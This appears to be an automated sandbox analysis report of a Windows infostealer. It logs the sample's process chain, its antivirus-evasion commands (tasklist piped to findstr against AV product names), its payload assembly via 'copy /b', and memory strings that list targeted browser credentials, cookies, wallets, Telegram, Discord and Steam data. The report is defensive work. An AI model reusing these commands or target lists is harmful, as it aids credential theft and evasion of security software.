            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: dbghelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: Google Drive.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: YouTube.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Sheets.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Gmail.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Slides.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Docs.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: nB52P46OJD.exeStatic file information: File size 1357367 > 1048576
            Source: nB52P46OJD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: cryptosetup.pdbGCTL source: Participating.com, 0000000B.00000002.2647629721.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, RIMOH4.11.dr
            Source: Binary string: cryptosetup.pdb source: Participating.com, 0000000B.00000002.2647629721.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, RIMOH4.11.dr
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
            Source: nB52P46OJD.exeStatic PE information: real checksum: 0x1598d1 should be: 0x157e95
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CF29D3 push ds; iretd 11_2_00CF29D6
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D00DE6 push ecx; ret 11_2_00D00DF9
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D36E54 push 1B7900D3h; iretd 11_2_00D36E59
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D36E5C push 1B7900D3h; iretd 11_2_00D36E65
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CF1768 push cs; iretd 11_2_00CF176A
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CF1765 push cs; iretd 11_2_00CF1766

            Persistence and Installation Behavior

            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\615578\Participating.comJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile created: C:\ProgramData\479RQ1NOHDJM\RIMOH4Jump to dropped file

            Boot Survival

            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D726DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_00D726DD
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CFFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00CFFC7C
            Source: C:\Users\user\Desktop\nB52P46OJD.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_11-104731
            Source: Participating.com, 0000000B.00000002.2640138284.0000000000131000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
            Source: Participating.com, 0000000B.00000002.2646862298.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comDropped PE file which has not been started: C:\ProgramData\479RQ1NOHDJM\RIMOH4
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comAPI coverage: 3.7 %
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D4DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00D4DC54
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D5A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00D5A087
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D5A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00D5A1E2
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D4E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_00D4E472
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D5A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_00D5A570
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D566DC FindFirstFileW,FindNextFileW,FindClose,11_2_00D566DC
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D1C622 FindFirstFileExW,11_2_00D1C622
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D573D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_00D573D4
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D57333 FindFirstFileW,FindClose,11_2_00D57333
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D4D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00D4D921
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CE5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00CE5FC8
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
            Source: Participating.com, 0000000B.00000002.2646862298.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 12.1294acdd3f4c6dd4a258e9798170c0159INSERT_KEY_HEREGetProcALoadLibrlstrcatAOpenEvenCreateEvCloseHanVirtualAllocExNuVirtualFGetSysteVirtualAHeapAlloGetComputerNameAlstrcpyAGetProceGetCurrentProceslstrlenAExitProcSystemTimeToFileadvapi32gdi32.dluser32.dcrypt32.ntdll.dlGetUserNCreateDCGetDevicReleaseDVMwareVMJohnDoe%hu/%hu/GetEnvironmentVariableAGetFileAttributeGlobalLoHeapFreeGetFileSGlobalSiIsWow64PProcess3GetLocalFreeLibrGetTimeZoneInforGetSystemPowerStGetWindowsDirectGetModuleFileNamDeleteFiFindNextLocalFreFindClosSetEnvironmentVaLocalAllReadFileSetFilePWriteFilCreateFiFindFirsCopyFileVirtualPGetLastElstrcpynMultiByteToWideCGlobalFrWideCharToMultiBGlobalAlOpenProcTerminateProcessgdiplus.ole32.dlbcrypt.dwininet.shlwapi.shell32.psapi.dlrstrtmgrCreateCompatibleSelectObDeleteObGdiplusSGdiplusShutdownGdipSaveImageToSGdipDisposeImageGdipFreeGetHGlobalFromStCreateStreamOnHGCoUninitCoInitiaCoCreateInstanceBCryptDeBCryptSetPropertBCryptDestroyKeyGetWindoGetDesktopWindowCloseWinwsprintfEnumDisplayDevicGetKeyboardLayouCharToOeRegQueryValueExARegEnumKRegOpenKRegCloseRegEnumVCryptBinaryToStrSHGetFolderPathAShellExecuteExAInternetOpenUrlAInternetConnectAInternetCloseHanInternetHttpSendRequestAHttpOpenRequestAInternetReadFileInternetCrackUrlStrCmpCAStrStrAStrCmpCWPathMatcRmStartSRmRegisterResourRmGetLisRmEndSessqlite3_sqlite3_prepare_sqlite3_column_tsqlite3_finalizesqlite3_column_bencrypteNSS_InitNSS_ShutPK11_GetInternalKeySlotPK11_FrePK11_AuthenticatPK11SDR_DecryptC:\ProgramData\profile:Login: PasswordOperaGXNetworkCookiesAutofillHistoryMonth: Login DaWeb Datalogins.jformSubmusernameencryptedUsernamencryptedPassworcookies.places.sPluginsSync Extension SettingsIndexedDOpera StOpera GX StableCURRENTchrome-extension_0.indexeddb.levLocal StprofilesfirefoxWallets%08lX%04ProductN%d/%d/%d 
%d:%d:%DisplayNDisplayVfreebl3.mozglue.msvcp140nss3.dllsoftokn3vcruntime140.dll/c start%DESKTOP%APPDATA%LOCALAP%USERPRO%DOCUMEN%PROGRAM%PROGRAMFILES_86%RECENT%\discord\Local Storage\l\Telegram Desktokey_dataD877F783D5D3EF8CA7FDF864FBC10B77A92DAA6EA6F891F2F8806DD0C461824FTelegram\.purpleaccountsdQw4w9Wgtoken: Software\Valve\SSteamPat\config\config.vDialogConfig.vdflibraryfolders.vloginuse\Steam\sqlite3.browsers\Discord\tokens.HTTP/1.1file_nammessagescreensh
            Source: Web Data.23.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: Web Data.23.drBinary or memory string: discord.comVMware20,11696494690f
            Source: Web Data.23.drBinary or memory string: AMC password management pageVMware20,11696494690
            Source: Web Data.23.drBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: Web Data.23.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: Web Data.23.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: Web Data.23.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: Web Data.23.drBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: Web Data.23.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: Web Data.23.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: Web Data.23.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: Web Data.23.drBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: Participating.com, 0000000B.00000002.2645190328.00000000019EA000.00000004.00000020.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2646862298.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: msedge.exe, 00000015.00000003.2150384624.000047B80030C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
            Source: Web Data.23.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: Web Data.23.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: Web Data.23.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: Web Data.23.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: Web Data.23.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: msedge.exe, 00000015.00000002.2187098588.0000022AE9044000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: Web Data.23.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: Web Data.23.drBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: Web Data.23.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: Web Data.23.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: nB52P46OJD.exeBinary or memory string: =qEMu
            Source: Participating.com, 0000000B.00000002.2646862298.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareVM
            Source: Web Data.23.drBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: Web Data.23.drBinary or memory string: global block list test formVMware20,11696494690
            Source: Participating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVMware
            Source: Web Data.23.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: Web Data.23.drBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: Web Data.23.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: Web Data.23.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: Web Data.23.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: Web Data.23.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: Web Data.23.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: Web Data.23.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comProcess information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D5F4FF BlockInput,11_2_00D5F4FF
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CE338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00CE338B
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D05058 mov eax, dword ptr fs:[00000030h]11_2_00D05058
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D420AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,11_2_00D420AA
            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D12992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00D12992
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D00BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00D00BAF
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D00D45 SetUnhandledExceptionFilter,11_2_00D00D45
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D00F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00D00F91
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D41B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00D41B4D
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D4BBED SendInput,keybd_event,11_2_00D4BBED
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D4ECD0 mouse_event,11_2_00D4ECD0
            Source: C:\Users\user\Desktop\nB52P46OJD.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 615578
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "applied" Manually
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Saddam + ..\Intro + ..\Perfectly + ..\Robertson + ..\Warm w
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\615578\Participating.com Participating.com w
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D414AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,11_2_00D414AE
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D41FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00D41FB0
            Source: Participating.com, 0000000B.00000000.1444230064.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp, Participating.com.2.dr, Computing.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Participating.comBinary or memory string: Shell_TrayWnd
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D00A08 cpuid 11_2_00D00A08
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D3E5F4 GetLocalTime,11_2_00D3E5F4
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D3E652 GetUserNameW,11_2_00D3E652
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D1BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_00D1BCD2
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

            Stealing of Sensitive Information

            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: Process Memory Space: Participating.com PID: 8084, type: MEMORYSTR
